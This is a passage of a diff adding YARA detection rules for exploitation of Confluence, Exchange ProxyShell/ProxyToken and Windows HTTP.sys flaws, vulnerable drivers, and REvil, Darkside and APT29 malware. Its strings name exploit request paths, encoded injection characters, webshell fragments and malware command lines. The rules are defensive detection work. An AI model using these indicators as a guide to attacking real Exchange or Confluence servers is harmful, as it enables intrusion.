+      tags = "CVE_2021_26084, DEMO, EXPLOIT, LOG"
+      minimum_yara = "2.2.0"
+      
+   strings:
+      $xr1 = /isSafeExpression Unsafe clause found in \['[^\n]{1,64}\\u0027/ ascii wide
+      $xs1 = "[util.velocity.debug.DebugReferenceInsertionEventHandler] referenceInsert resolving reference [$!queryString]" 
+      $xs2 = "userName: anonymous | action: createpage-entervariables ognl.ExpressionSyntaxException: Malformed OGNL expression: '\\' [ognl.TokenMgrError: Lexical error at line 1" 
+      $sa1 = "GET /pages/doenterpagevariables.action" 
+      $sb1 = "%5c%75%30%30%32%37" 
+      $sb2 = "\\u0027" 
+      $sc1 = " ERROR " 
+      $sc2 = " | userName: anonymous | action: createpage-entervariables" 
+      $re1 = /\[confluence\.plugins\.synchrony\.SynchronyContextProvider\] getContextMap (\n )?-- url: \/pages\/createpage-entervariables\.action/ 
+   condition: 
+      1 of ( $x* ) or ( $sa1 and 1 of ( $sb* ) ) or ( all of ( $sc* ) and $re1 )
+}
+
+rule LOG_EXPL_ProxyToken_Exploitation_Aug21_1_RID35DB : CVE_2021_33766 DEMO EXPLOIT LOG {
+   meta:
+      description = "Detects ProxyToken CVE-2021-33766 exploitation attempts on an unpatched system"
+      author = "Florian Roth"
+      reference = "https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server"
+      date = "2021-08-30 16:31:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2021_33766, DEMO, EXPLOIT, LOG"
+      minimum_yara = "1.7"
+      
+   strings:
+      $ss0 = "POST " ascii
+      $ss1 = " 500 0 0" 
+      $sa1 = "/ecp/" ascii
+      $sa2 = "/RulesEditor/InboxRules.svc/NewObject" ascii
+      $sb1 = "/ecp/" ascii
+      $sb2 = "SecurityToken=" ascii
+   condition: 
+      all of ( $ss* ) and ( all of ( $sa* ) or all of ( $sb* ) )
+}
+
+rule WEBSHELL_ASPX_ProxyShell_Exploitation_Aug21_1_RID3749 : DEMO MAL T1100 WEBSHELL {
+   meta:
+      description = "Detects unknown malicious loaders noticed in August 2021"
+      author = "Florian Roth"
+      reference = "https://twitter.com/VirITeXplorer/status/1430206853733097473"
+      date = "2021-08-25 17:32:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, MAL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = ");eval/*asf" ascii
+   condition: 
+      filesize < 600KB and 1 of them
+}
+
+rule SUSP_IIS_Config_ProxyShell_Artifacts_RID34CE : DEMO SUSP {
+   meta:
+      description = "Detects suspicious virtual directory configured in IIS pointing to a ProgramData folder (as found in attacks against Exchange servers in August 2021)"
+      author = "Florian Roth"
+      reference = "https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit"
+      date = "2021-08-25 15:46:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1 = "<site name=" ascii
+      $a2 = "<sectionGroup name=\"system.webServer\">" ascii
+      $s1 = " physicalPath=\"C:\\ProgramData\\" ascii
+   condition: 
+      filesize < 500KB and all of ( $a* ) and 1 of ( $s* )
+}
+
+rule SUSP_IIS_Config_VirtualDir_RID30BA : DEMO SUSP {
+   meta:
+      description = "Detects suspicious virtual directory configured in IIS pointing to a User folder"
+      author = "Florian Roth"
+      reference = "https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit"
+      date = "2021-08-25 12:52:11"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-09-17"
+      tags = "DEMO, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1 = "<site name=" ascii
+      $a2 = "<sectionGroup name=\"system.webServer\">" ascii
+      $s2 = " physicalPath=\"C:\\Users\\" ascii
+      $fp1 = "Microsoft.Web.Administration" wide
+      $fp2 = "<virtualDirectory path=\"/\" physicalPath=\"C:\\Users\\admin\\" 
+   condition: 
+      filesize < 500KB and all of ( $a* ) and 1 of ( $s* ) and not 1 of ( $fp* )
+}
+
+rule APT_IIS_Config_ProxyShell_Artifacts_RID3468 : APT DEMO {
+   meta:
+      description = "Detects virtual directory configured in IIS pointing to a ProgramData folder (as found in attacks against Exchange servers in August 2021)"
+      author = "Florian Roth"
+      reference = "https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit"
+      date = "2021-08-25 15:29:11"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1 = "<site name=" ascii
+      $a2 = "<sectionGroup name=\"system.webServer\">" ascii
+      $sa1 = " physicalPath=\"C:\\ProgramData\\COM" ascii
+      $sa2 = " physicalPath=\"C:\\ProgramData\\WHO" ascii
+      $sa3 = " physicalPath=\"C:\\ProgramData\\ZING" ascii
+      $sa4 = " physicalPath=\"C:\\ProgramData\\ZOO" ascii
+      $sa5 = " physicalPath=\"C:\\ProgramData\\XYZ" ascii
+      $sa6 = " physicalPath=\"C:\\ProgramData\\AUX" ascii
+      $sa7 = " physicalPath=\"C:\\ProgramData\\CON\\" ascii
+      $sb1 = " physicalPath=\"C:\\Users\\All Users\\" ascii
+   condition: 
+      filesize < 500KB and all of ( $a* ) and 1 of ( $s* )
+}
+
+rule WEBSHELL_ASPX_ProxyShell_Aug21_3_RID31EC : DEMO FILE T1100 WEBSHELL {
+   meta:
+      description = "Detects webshells dropped by ProxyShell exploitation based on their file header (must be DER), size and content"
+      author = "Max Altgelt"
+      reference = "https://twitter.com/gossithedog/status/1429175908905127938?s=12"
+      date = "2021-08-23 13:43:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Page Language=" ascii nocase
+   condition: 
+      uint16 ( 0 ) == 0x8230 and filesize < 10KB and $s1
+}
+
+rule EXPL_Exchange_ProxyShell_Failed_Aug21_1_RID3558 : DEMO EXPLOIT SCRIPT {
+   meta:
+      description = "Detects ProxyShell exploitation attempts in log files"
+      author = "Florian Roth"
+      reference = "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html"
+      date = "2021-08-08 16:09:11"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2021-08-09"
+      tags = "DEMO, EXPLOIT, SCRIPT"
+      minimum_yara = "2.2.0"
+      
+   strings:
+      $xr1 = / \/autodiscover\/autodiscover\.json[^\n]{1,300}\/(powershell|mapi\/nspi|EWS\/|X-Rps-CAT)[^\n]{1,400}401 0 0/ nocase ascii
+      $xr3 = /Email=autodiscover\/autodiscover\.json[^\n]{1,400}401 0 0/ nocase ascii
+   condition: 
+      1 of them
+}
+
+rule EXPL_Exchange_ProxyShell_Successful_Aug21_1_RID3733 : DEMO EXPLOIT SCRIPT {
+   meta:
+      description = "Detects successful ProxyShell exploitation attempts in log files"
+      author = "Florian Roth"
+      reference = "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html"
+      date = "2021-08-08 17:28:21"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2021-08-09"
+      tags = "DEMO, EXPLOIT, SCRIPT"
+      minimum_yara = "2.2.0"
+      
+   strings:
+      $xr1a = / \/autodiscover\/autodiscover\.json[^\n]{1,300}\/(powershell|X-Rps-CAT)/ nocase ascii
+      $xr1b = / \/autodiscover\/autodiscover\.json[^\n]{1,300}\/(mapi\/nspi|EWS\/)[^\n]{1,400}(200|302) 0 0/ 
+      $xr2 = /autodiscover\/autodiscover\.json[^\n]{1,60}&X-Rps-CAT=/ nocase ascii
+      $xr3 = /Email=autodiscover\/autodiscover\.json[^\n]{1,400}200 0 0/ nocase ascii
+   condition: 
+      1 of them
+}
+
+rule VULN_PrinterDriver_PrivEsc_CVE_2021_3438_Jul21_RID369F : CVE_2021_3438 DEMO EXE EXPLOIT FILE T1068 VULN {
+   meta:
+      description = "Detects affected drivers with PE timestamps older than the date of the initial report"
+      author = "Florian Roth"
+      reference = "https://labs.sentinelone.com/cve-2021-3438-16-years-in-hiding-millions-of-printers-worldwide-vulnerable/"
+      date = "2021-07-20 17:03:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7cc9ba2df7b9ea6bb17ee342898edd7f54703b93b6ded6a819e83a7ee9f938b4"
+      tags = "CVE_2021_3438, DEMO, EXE, EXPLOIT, FILE, T1068, VULN"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   strings:
+      $s1 = "This String is from Device Driver@@@@@ !!!" ascii
+      $s2 = "\\DosDevices\\ssportc" wide fullword
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and all of ( $s* ) and 1613606400 >= pe.timestamp
+}
+
+rule APT_MAL_REvil_Kaseya_Jul21_1_RID30AA : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware used in the Kaseya supply chain attack"
+      author = "Florian Roth"
+      reference = "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b"
+      date = "2021-07-02 12:49:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e"
+      hash2 = "aae6e388e774180bc3eb96dad5d5bfefd63d0eb7124d68b6991701936801f1c7"
+      hash3 = "dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "Mpsvc.dll" wide fullword
+      $s2 = ":0:4:8:<:@:D:H:L:P:T:X:\\:`:d:h:l:p:t:x:H<L<P<\\<`<" ascii fullword
+      $op1 = { 40 87 01 c3 6a 08 68 f8 0e 41 00 e8 ae db ff ff be 80 25 41 00 39 35 ?? 32 41 00 } 
+      $op2 = { 8b 40 04 2b c2 c1 f8 02 3b c8 0f 84 56 ff ff ff 68 15 50 40 00 2b c1 6a 04 } 
+      $op3 = { 74 73 db e2 e8 ad 07 00 00 68 60 1a 40 00 e8 8f 04 00 00 e8 3a 05 00 00 50 e8 25 26 00 00 } 
+      $op4 = { 75 05 8b 45 fc eb 4c c7 45 f8 00 00 00 00 6a 00 8d 45 f0 50 8b 4d 0c } 
+      $op5 = { 83 7d 0c 00 75 05 8b 45 fc eb 76 6a 00 68 80 00 00 00 6a 01 6a 00 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "c36dcd2277c4a707a1a645d0f727542a" or 2 of them )
+}
+
+rule APT_MAL_REvil_Kaseya_Jul21_2_RID30AB : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware used in the Kaseya supply chain attack"
+      author = "Florian Roth"
+      reference = "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b"
+      date = "2021-07-02 12:49:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402"
+      hash2 = "8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd"
+      hash3 = "cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $opa1 = { 8b 4d fc 83 c1 01 89 4d fc 81 7d f0 ff 00 00 00 77 1? ba 01 00 00 00 6b c2 00 8b 4d 08 } 
+      $opa2 = { 89 45 f0 8b 4d fc 83 c1 01 89 4d fc 81 7d f0 ff 00 00 00 77 1? ba 01 00 00 00 6b c2 00 } 
+      $opa3 = { 83 c1 01 89 4d fc 81 7d f0 ff 00 00 00 77 1? ba 01 00 00 00 6b c2 00 8b 4d 08 0f b6 14 01 } 
+      $opa4 = { 89 45 f4 8b 0d ?? ?0 07 10 89 4d f8 8b 15 ?? ?1 07 10 89 55 fc ff 75 fc ff 75 f8 ff 55 f4 } 
+      $opb1 = { 18 00 10 bd 18 00 10 bd 18 00 10 0e 19 00 10 cc cc cc } 
+      $opb2 = { 18 00 10 0e 19 00 10 cc cc cc cc 8b 44 24 04 } 
+      $opb3 = { 10 c4 18 00 10 bd 18 00 10 bd 18 00 10 0e 19 00 10 cc cc } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and ( 2 of ( $opa* ) or 3 of them )
+}
+
+rule APT_APT29_NOBELIUM_JS_EnvyScout_May21_1_RID33E3 : APT DEMO G0016 G0118 RUSSIA {
+   meta:
+      description = "Detects EnvyScout deobfuscator code as used by NOBELIUM group"
+      author = "Florian Roth"
+      reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+      date = "2021-05-29 15:07:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, G0016, G0118, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[i].charCodeAt(0) ^ 2);}" 
+   condition: 
+      filesize < 5000KB and 1 of them
+}
+
+rule APT_APT29_NOBELIUM_JS_EnvyScout_May21_2_RID33E4 : APT DEMO G0016 G0118 RUSSIA {
+   meta:
+      description = "Detects EnvyScout deobfuscator code as used by NOBELIUM group"
+      author = "Florian Roth"
+      reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+      date = "2021-05-29 15:07:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, G0016, G0118, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "saveAs(blob, " ascii
+      $s2 = ".iso\");" ascii
+      $s3 = "application/x-cd-image" ascii
+      $s4 = ".indexOf(\"Win\")!=-1" ascii
+   condition: 
+      filesize < 5000KB and all of them
+}
+
+rule APT_APT29_NOBELIUM_LNK_NV_Link_May21_2_RID330D : APT DEMO G0016 G0118 RUSSIA T1023 {
+   meta:
+      description = "Detects NV Link as used by NOBELIUM group"
+      author = "Florian Roth"
+      reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+      date = "2021-05-29 14:31:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, G0016, G0118, RUSSIA, T1023"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "RegisterOCX BOOM" ascii wide
+      $s2 = "cmd.exe /c start BOOM.exe" ascii wide
+   condition: 
+      filesize < 5000KB and 1 of them
+}
+
+rule APT_APT29_NOBELIUM_BoomBox_May21_2_RID31EE : APT DEMO EXE G0016 G0118 MAL RUSSIA T1085 {
+   meta:
+      description = "Detects BoomBox malware used by APT29 / NOBELIUM"
+      author = "Florian Roth"
+      reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+      date = "2021-05-29 13:43:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0acb884f2f4cfa75b726cb8290b20328c8ddbcd49f95a1d761b7d131b95bafec"
+      hash2 = "8199f309478e8ed3f03f75e7574a3e9bce09b4423bd7eb08bb5bff03af2b7c27"
+      hash3 = "cf1d992f776421f72eabc31d5afc2f2067ae856f1c9c1d6dc643a67cb9349d8c"
+      tags = "APT, DEMO, EXE, G0016, G0118, MAL, RUSSIA, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\Microsoft\\NativeCache\\NativeCacheSvc.dll" wide
+      $x2 = "\\NativeCacheSvc.dll _configNativeCache" wide
+      $a1 = "/content.dropboxapi.com" wide fullword
+      $s1 = "rundll32.exe {0} {1}" wide fullword
+      $s2 = "\\\\CertPKIProvider.dll" wide
+      $s3 = "/tmp/readme.pdf" wide
+      $s4 = "temp/[^\"]*)\"" wide fullword
+      $op1 = { 00 78 00 2d 00 41 00 50 00 49 00 2d 00 41 00 72 00 67 00 01 2f 4f 00 72 00 } 
+      $op2 = { 25 72 98 01 00 70 6f 34 00 00 0a 25 6f 35 00 00 0a 72 71 02 00 70 72 } 
+      $op3 = { 4d 05 20 00 12 80 91 04 20 01 08 0e 04 20 00 12 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 40KB and 3 of them or 4 of them
+}
+
+rule APT_APT29_NOBELIUM_Malware_May21_2_RID3201 : APT DEMO G0016 G0118 MAL RUSSIA {
+   meta:
+      description = "Detects malware used by APT29 / NOBELIUM"
+      author = "Florian Roth"
+      reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+      date = "2021-05-29 13:46:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "292e5b0a12fea4ff3fc02e1f98b7a370f88152ce71fe62670dd2f5edfaab2ff8"
+      hash2 = "776014a63bf3cc7034bd5b6a9c36c75a930b59182fe232535bb7a305e539967b"
+      tags = "APT, DEMO, G0016, G0118, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $op1 = { 48 03 c8 42 0f b6 04 21 88 03 0f b6 43 01 8b c8 83 e0 0f 48 83 e1 f0 48 03 c8 } 
+      $op2 = { 48 03 c8 42 0f b6 04 21 88 43 01 41 0f b6 c7 8b c8 83 e0 0f 48 83 e1 f0 48 03 c8 } 
+      $op3 = { 45 0f b6 43 ff 41 8b c2 99 44 88 03 41 0f b6 2b 83 e2 03 03 c2 40 88 6b 01 } 
+   condition: 
+      filesize < 2200KB and all of them
+}
+
+rule APT_APT29_NOBELIUM_Malware_May21_3_RID3202 : APT DEMO G0016 G0118 MAL RUSSIA {
+   meta:
+      description = "Detects malware used by APT29 / NOBELIUM"
+      author = "Florian Roth"
+      reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+      date = "2021-05-29 13:46:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2a352380d61e89c89f03f4008044241a38751284995d000c73acf9cad38b989e"
+      tags = "APT, DEMO, G0016, G0118, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Win32Project1.dll" ascii fullword
+      $op1 = { 59 c3 6a 08 68 70 5e 01 10 e8 d2 8c ff ff 8b 7d 08 8b c7 c1 f8 05 } 
+      $op2 = { 8d 4d f0 e8 c4 12 00 00 68 64 5b 01 10 8d 45 f0 c7 45 f0 6c 01 01 10 50 e8 ea 13 00 00 cc } 
+      $op4 = { 40 c3 8b 65 e8 e8 a6 86 ff ff cc 6a 0c 68 88 60 01 10 e8 b0 4d ff ff } 
+      $xc1 = { 25 73 25 73 00 00 00 00 2F 65 2C 20 00 00 00 00
+               43 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00
+               77 00 73 00 5C 00 65 00 78 00 70 00 6C 00 6F 00
+               72 00 65 00 72 00 2E 00 65 00 78 00 65 } 
+   condition: 
+      filesize < 3000KB and ( $xc1 or 3 of them )
+}
+
+rule APT_APT29_NOBELIUM_Malware_May21_4_RID3203 : APT DEMO EXE FILE G0016 G0118 MAL RUSSIA {
+   meta:
+      description = "Detects malware used by APT29 / NOBELIUM"
+      author = "Florian Roth"
+      reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+      date = "2021-05-29 13:47:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3b94cc71c325f9068105b9e7d5c9667b1de2bde85b7abc5b29ff649fd54715c4"
+      tags = "APT, DEMO, EXE, FILE, G0016, G0118, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "KM.FileSystem.dll" ascii fullword
+      $op1 = { 80 3d 50 6b 04 10 00 0f 85 96 00 00 00 33 c0 40 b9 48 6b 04 10 87 01 33 db 89 5d fc } 
+      $op2 = { c3 33 c0 b9 7c 6f 04 10 40 87 01 c3 8b ff 55 } 
+      $op3 = { 8d 4d f4 e8 53 ff ff ff 68 d0 22 01 10 8d 45 f4 50 e8 d8 05 00 00 cc 8b 41 04 } 
+      $xc1 = { 2E 64 6C 6C 00 00 00 00 41 53 4B 4F 44 00 00 00
+               53 75 63 63 65 73 73 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and ( $xc1 or 3 of them )
+}
+
+rule APT_APT29_NOBELIUM_LNK_Samples_May21_1_RID3350 : APT DEMO FILE G0016 G0118 RUSSIA T1023 T1085 T1210 {
+   meta:
+      description = "Detects link file characteristics as described in APT29 NOBELIUM report"
+      author = "Florian Roth"
+      reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
+      date = "2021-05-27 14:42:31"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "24caf54e7c3fe308444093f7ac64d6d520c8f44ea4251e09e24931bdb72f5548"
+      tags = "APT, DEMO, FILE, G0016, G0118, RUSSIA, T1023, T1085, T1210"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1 = "rundll32.exe" wide
+      $sa1 = "IMGMountingService.dll" wide
+      $sa2 = "MountImgHelper" wide
+      $sb1 = "diassvcs.dll" wide
+      $sb2 = "InitializeComponent" wide
+      $sc1 = "MsDiskMountService.dll" wide
+      $sc2 = "DiskDriveIni" wide
+      $sd1 = "GraphicalComponent.dll" wide
+      $sd2 = "VisualServiceComponent" wide
+      $se1 = "data/mstu.dll,MicrosoftUpdateService" wide
+   condition: 
+      uint16 ( 0 ) == 0x004c and filesize < 4KB and $a1 and ( all of ( $sa* ) or all of ( $sb* ) or all of ( $sc* ) or all of ( $sd* ) or all of ( $se* ) )
+}
+
+rule APT_APT29_NOBELIUM_BoomBox_May21_1_RID31ED : APT DEMO G0016 G0118 MAL RUSSIA {
+   meta:
+      description = "Detects BoomBox malware as described in APT29 NOBELIUM report"
+      author = "Florian Roth"
+      reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
+      date = "2021-05-27 13:43:21"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, G0016, G0118, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $xa1 = "123do3y4r378o5t34onf7t3o573tfo73" ascii wide fullword
+      $xa2 = "1233t04p7jn3n4rg" ascii wide fullword
+   condition: 
+      1 of them
+}
+
+rule APT_APT29_NOBELIUM_BoomBox_PDF_Masq_May21_1_RID3517 : APT DEMO G0016 G0118 RUSSIA {
+   meta:
+      description = "Detects PDF documents as used by BoomBox as described in APT29 NOBELIUM report"
+      author = "Florian Roth"
+      reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
+      date = "2021-05-27 15:58:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, G0016, G0118, RUSSIA"
+      required_modules = "math"
+      minimum_yara = "3.3.0"
+      
+   strings:
+      $ah1 = { 25 50 44 46 2d 31 2e 33 0a 25 } 
+      $af1 = { 0a 25 25 45 4f 46 0a } 
+      $fp1 = "endobj" ascii
+      $fp2 = "endstream" ascii
+      $fp3 = { 20 6F 62 6A 0A } 
+   condition: 
+      $ah1 at 0 and $af1 at ( filesize - 7 ) and filesize < 100KB and math.entropy ( 16 , filesize ) > 7 and not 1 of ( $fp* )
+}
+
+rule APT_APT29_NOBELIUM_NativeZone_Loader_May21_1_RID35F0 : APT DEMO EXE G0016 G0118 RUSSIA T1085 {
+   meta:
+      description = "Detects NativeZone loader as described in APT29 NOBELIUM report"
+      author = "Florian Roth"
+      reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
+      date = "2021-05-27 16:34:31"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "136f4083b67bc8dc999eb15bb83042aeb01791fc0b20b5683af6b4ddcf0bbc7d"
+      tags = "APT, DEMO, EXE, G0016, G0118, RUSSIA, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\SystemCertificates\\Lib\\CertPKIProvider.dll" ascii
+      $s2 = "rundll32.exe %s %s" ascii fullword
+      $s3 = "eglGetConfigs" ascii fullword
+      $op1 = { 80 3d 74 8c 01 10 00 0f 85 96 00 00 00 33 c0 40 b9 6c 8c 01 10 87 01 33 db 89 5d fc } 
+      $op2 = { 8b 46 18 e9 30 ff ff ff 90 87 2f 00 10 90 2f 00 10 } 
+      $op3 = { e8 14 dd ff ff 8b f1 80 3d 74 8c 01 10 00 0f 85 96 00 00 00 33 c0 40 b9 6c 8c 01 10 87 01 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and 3 of them or 4 of them
+}
+
+rule EXPL_CVE_2021_31166_Accept_Encoding_May21_1_RID34B9 : CVE_2021_31166 DEMO EXPLOIT {
+   meta:
+      description = "Detects malformed Accept-Encoding header field as used in code exploiting CVE-2021-31166"
+      author = "Florian Roth"
+      reference = "https://github.com/0vercl0k/CVE-2021-31166"
+      date = "2021-05-21 15:42:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2021_31166, DEMO, EXPLOIT"
+      minimum_yara = "2.2.0"
+      
+   strings:
+      $xr1 = /[Aa]ccept\-[Ee]ncoding: [a-z\-]{1,16},([a-z\-\s]{1,16},|)*[\s]{1,20},/ 
+   condition: 
+      1 of them
+}
+
+rule MAL_RANSOM_Darkside_May21_1_RID3019 : CRIME DEMO EXE FILE MAL RANSOM {
+   meta:
+      description = "Detects Darkside Ransomware"
+      author = "Florian Roth"
+      reference = "https://app.any.run/tasks/020c1740-717a-4191-8917-5819aa25f385/"
+      date = "2021-05-10 12:25:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ec368752c2cf3b23efbfa5705f9e582fc9d6766435a7b8eea8ef045082c6fbce"
+      tags = "CRIME, DEMO, EXE, FILE, MAL, RANSOM"
+      minimum_yara = "1.7"
+      
+   strings:
+      $op1 = { 85 c9 75 ed ff 75 10 ff b5 d8 fe ff ff ff b5 dc fe ff ff e8 7d fc ff ff ff 8d cc fe ff ff 8b 8d cc fe ff ff } 
+      $op2 = { 66 0f 6f 06 66 0f 7f 07 83 c6 10 83 c7 10 49 85 c9 75 ed 5f } 
+      $op3 = { 6a 00 ff 15 72 0d 41 00 ab 46 81 fe 80 00 00 00 75 2e 6a ff 6a 01 } 
+      $op4 = { 0f b7 0c 5d 88 0f 41 00 03 4c 24 04 89 4c 24 04 83 e1 3f 0f b7 14 4d 88 0f 41 00 03 54 24 08 89 54 24 08 83 e2 3f } 
+      $s1 = "http://darksid" ascii
+      $s2 = "[ Welcome to DarkSide ]" ascii
+      $s3 = ".onion/" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 3 of them or all of ( $op* ) or all of ( $s* )
+}
+
+rule VULN_Dell_BIOS_Update_Driver_DBUtil_May21_RID35BB : CVE_2021_21551 DEMO EXE EXPLOIT FILE T1068 VULN {
+   meta:
+      description = "Detects vulnerable DELL BIOS update driver that allows privilege escalation as reported in CVE-2021-21551 - DBUtil_2_3.Sys - note: it's usual location is in the C:\\Windows\\Temp folder"
+      author = "Florian Roth"
+      reference = "https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/"
+      date = "2021-05-05 16:25:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5"
+      hash2 = "ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1"
+      tags = "CVE_2021_21551, DEMO, EXE, EXPLOIT, FILE, T1068, VULN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\DBUtilDrv2" ascii
